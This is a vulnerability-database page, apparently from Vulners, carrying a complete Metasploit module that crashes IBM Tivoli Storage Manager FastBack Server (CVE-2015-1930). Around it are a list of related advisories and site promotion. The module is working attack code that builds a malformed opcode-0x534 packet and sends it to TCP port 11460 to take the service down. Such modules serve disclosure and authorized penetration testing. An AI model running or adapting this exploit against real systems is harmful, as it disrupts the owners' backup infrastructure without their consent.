IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service
🗓️ 15 Dec 2015 00:00:00Reported by Gianni Gnesa, William Webb <[email protected]>Type
metasploit🔗 www.rapid7.com👁 42 Views
| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
| Security Bulletin: IBM Tivoli Storage Manager FastBack Server Stack Based Buffer Overflow Vulnerability (CVE-2015-1930) | 19 Aug 202221:04 | – | ibm | |
| Security Bulletin: Multiple Security Vulnerabilities in IBM Tivoli Storage Manager FastBack | 19 Aug 202223:26 | – | ibm | |
| The vulnerability of the Tivoli Storage Manager FastBack data management program allows a hacker to trigger a service failure. | 8 Jul 201500:00 | – | bdu_fstec | |
| CVE-2015-1930 | 29 May 201815:50 | – | circl | |
| IBM Tivoli Storage Manager FastBack Stack Buffer Overflow Vulnerability (CNVD-2015-04169) | 1 Jul 201500:00 | – | cnvd | |
| CVE-2015-1930 | 30 Jun 201515:00 | – | cve | |
| CVE-2015-1930 | 30 Jun 201515:00 | – | cvelist | |
| EUVD-2015-2035 | 7 Oct 202500:30 | – | euvd | |
| IBM Tivoli Storage Manager FastBack 6.1.x < 6.1.12 Multiple Vulnerabilities | 7 Jul 201500:00 | – | nessus | |
| CVE-2015-1930 | 30 Jun 201515:59 | – | nvd |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(
update_info(
info,
'Name' => 'IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service',
'Description' => %q{
This module exploits a denial of service condition present in IBM Tivoli Storage Manager
FastBack Server when dealing with packets triggering the opcode 0x534 handler.
},
'License' => MSF_LICENSE,
'Author' => [
'Gianni Gnesa', # Public disclosure/Proof of Concept
'William Webb <william_webb[at]rapid7.com>', # Metasploit
],
'References' => [
['CVE', '2015-1930'],
['EDB', '38979'],
['OSVDB', '132307']
],
'DisclosureDate' => '2015-12-15',
'Notes' => {
'Stability' => [CRASH_SERVICE_DOWN],
'SideEffects' => [],
'Reliability' => []
}
)
)
register_options(
[
Opt::RPORT(11460)
]
)
end
def tv_pkt(opcode, p1 = '', p2 = '', p3 = '')
buf = Rex::Text.rand_text_alpha(0x0C)
buf += [opcode].pack('V')
buf += [0x00].pack('V')
buf += [p1.length].pack('V')
buf += [p1.length].pack('V')
buf += [p2.length].pack('V')
buf += [p1.length + p2.length].pack('V')
buf += [p3.length].pack('V')
buf += Rex::Text.rand_text_alpha(0x08)
buf += p1
buf += p2
buf += p3
pkt = [buf.length].pack('N')
pkt << buf
return pkt
end
def run
target_opcode = 0x534
connect
print_status("Connected to: #{rhost} port: #{rport}")
print_status('Sending malicious packet')
p = tv_pkt(
target_opcode,
"File: #{Rex::Text.rand_text_alpha(0x200)} From: 0 To: 0 ChunkLoc: 0 FileLoc: 0",
Rex::Text.rand_text_alpha(0x60),
Rex::Text.rand_text_alpha(0x60)
)
sock.put(p)
print_status('Packet sent!')
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
print_error("Exploit failed: #{e.class} #{e.message}")
elog(e)
ensure
disconnect
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Dec 2015 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 27.8
EPSS0.09971